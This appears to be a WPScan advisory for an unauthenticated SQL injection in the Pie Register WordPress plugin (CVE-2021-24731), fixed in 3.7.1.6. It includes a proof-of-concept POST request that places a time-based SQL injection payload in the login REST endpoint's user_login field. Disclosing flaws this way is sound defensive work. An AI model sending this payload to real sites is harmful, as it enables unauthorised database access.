WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Pie Register < 3.7.1.6 - Unauthenticated SQL Injection

Description

The plugin does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.

Proof of Concept

POST /wp-json/pie/v1/login HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Connection: close

user_login='%20OR%20SLEEP(1)--&login_pass=a

Affects Plugins

pie-register
Fixed in version 3.7.1.6

References

CVE
CVE-2021-24731

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

AyeCode Ltd

Submitter

Stiofan

Submitter website
https://ayecode.io/
Submitter twitter
_stiofan
Verified

Yes

WPVDB ID
6bed00e4-b363-43b8-a392-d068d342151a

Timeline

Publicly Published

2021-10-11 (about 1 years ago)

Added

2021-10-11 (about 1 years ago)

Last Updated

2022-04-08 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin